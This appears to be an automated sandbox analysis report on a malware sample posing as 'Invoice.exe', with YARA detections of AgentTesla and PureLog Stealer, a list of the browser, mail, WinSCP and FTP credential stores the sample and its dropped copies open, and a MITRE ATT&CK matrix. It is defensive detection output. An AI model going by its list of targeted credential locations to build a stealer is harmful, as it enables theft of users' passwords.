Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Queries volume information: C:\Users\user\Desktop\Invoice.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe	Queries volume information: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe	Queries volume information: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Queries volume information: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Queries volume information: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Queries volume information: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Queries volume information: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation

Source: C:\Users\user\Desktop\Invoice.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected AgentTesla

Source: Yara match	File source: 11.2.kaJNzBnxbXm.exe.42aa410.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.kaJNzBnxbXm.exe.42aa410.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.BjTxJte.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Invoice.exe.4b48230.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.kaJNzBnxbXm.exe.426f1f0.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.kaJNzBnxbXm.exe.426f1f0.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Invoice.exe.4a4f1f0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Invoice.exe.4acba10.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Invoice.exe.4b48230.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000014.00000002.1937601550.0000000002C3C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.1937601550.0000000002C11000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.4154923475.0000000003141000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001B.00000002.4153454103.0000000002FB1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.1933061893.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.1756637194.00000000040EE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.1937601550.0000000002C44000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.4154310279.00000000028DB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001B.00000002.4153454103.0000000002FDC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1711744311.0000000004847000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001B.00000002.4153454103.0000000002FE4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.4154923475.000000000318B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.1756637194.000000000426F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Invoice.exe PID: 6428, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Invoice.exe PID: 7396, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: kaJNzBnxbXm.exe PID: 7496, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: kaJNzBnxbXm.exe PID: 7788, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: BjTxJte.exe PID: 8148, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: BjTxJte.exe PID: 6356, type: MEMORYSTR

Yara detected PureLog Stealer

Source: Yara match	File source: 0.2.Invoice.exe.3e59970.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Invoice.exe.3e59970.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Invoice.exe.56c0000.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Invoice.exe.56c0000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1721400076.00000000056C0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1711744311.0000000003E59000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Source: C:\Users\user\Desktop\Invoice.exe	Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions	Jump to behavior
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe	Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	File opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	File opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe

File opened: C:\FTP Navigator\Ftplist.txt

Tries to steal Mail credentials (via file / registry access)

Source: C:\Users\user\Desktop\Invoice.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities	Jump to behavior
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe	Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities

Source: Yara match	File source: 11.2.kaJNzBnxbXm.exe.42aa410.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.kaJNzBnxbXm.exe.42aa410.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.BjTxJte.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Invoice.exe.4b48230.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.kaJNzBnxbXm.exe.426f1f0.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.kaJNzBnxbXm.exe.426f1f0.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Invoice.exe.4a4f1f0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Invoice.exe.4acba10.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Invoice.exe.4b48230.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000014.00000002.1937601550.0000000002C11000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.4154923475.0000000003141000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001B.00000002.4153454103.0000000002FB1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.1933061893.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.1756637194.00000000040EE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.4154310279.00000000028DB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1711744311.0000000004847000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.1756637194.000000000426F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Invoice.exe PID: 6428, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Invoice.exe PID: 7396, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: kaJNzBnxbXm.exe PID: 7496, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: kaJNzBnxbXm.exe PID: 7788, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: BjTxJte.exe PID: 8148, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: BjTxJte.exe PID: 6356, type: MEMORYSTR

Remote Access Functionality

Yara detected AgentTesla

Source: Yara match	File source: 11.2.kaJNzBnxbXm.exe.42aa410.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.kaJNzBnxbXm.exe.42aa410.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.BjTxJte.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Invoice.exe.4b48230.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.kaJNzBnxbXm.exe.426f1f0.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.kaJNzBnxbXm.exe.426f1f0.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Invoice.exe.4a4f1f0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Invoice.exe.4acba10.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Invoice.exe.4b48230.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000014.00000002.1937601550.0000000002C3C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.1937601550.0000000002C11000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.4154923475.0000000003141000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001B.00000002.4153454103.0000000002FB1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.1933061893.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.1756637194.00000000040EE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.1937601550.0000000002C44000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.4154310279.00000000028DB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001B.00000002.4153454103.0000000002FDC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1711744311.0000000004847000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001B.00000002.4153454103.0000000002FE4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.4154923475.000000000318B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.1756637194.000000000426F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Invoice.exe PID: 6428, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Invoice.exe PID: 7396, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: kaJNzBnxbXm.exe PID: 7496, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: kaJNzBnxbXm.exe PID: 7788, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: BjTxJte.exe PID: 8148, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: BjTxJte.exe PID: 6356, type: MEMORYSTR

Yara detected PureLog Stealer

Source: Yara match	File source: 0.2.Invoice.exe.3e59970.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Invoice.exe.3e59970.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Invoice.exe.56c0000.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Invoice.exe.56c0000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1721400076.00000000056C0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1711744311.0000000003E59000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	121 Windows Management Instrumentation	1 DLL Side-Loading	1 DLL Side-Loading	11 Disable or Modify Tools	2 OS Credential Dumping	1 File and Directory Discovery	Remote Services	11 Archive Collected Data	1 Ingress Tool Transfer	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 Scheduled Task/Job	1 Scheduled Task/Job	112 Process Injection	1 Deobfuscate/Decode Files or Information	21 Input Capture	24 System Information Discovery	Remote Desktop Protocol	2 Data from Local System	11 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	1 Registry Run Keys / Startup Folder	1 Scheduled Task/Job	2 Obfuscated Files or Information	1 Credentials in Registry	1 Query Registry	SMB/Windows Admin Shares	1 Email Collection	1 Non-Standard Port	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	1 Registry Run Keys / Startup Folder	22 Software Packing	NTDS	211 Security Software Discovery	Distributed Component Object Model	21 Input Capture	2 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 DLL Side-Loading	LSA Secrets	2 Process Discovery	SSH	1 Clipboard Data	23 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Masquerading	Cached Domain Credentials	141 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	141 Virtualization/Sandbox Evasion	DCSync	1 Application Window Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	112 Process Injection	Proc Filesystem	1 System Network Configuration Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
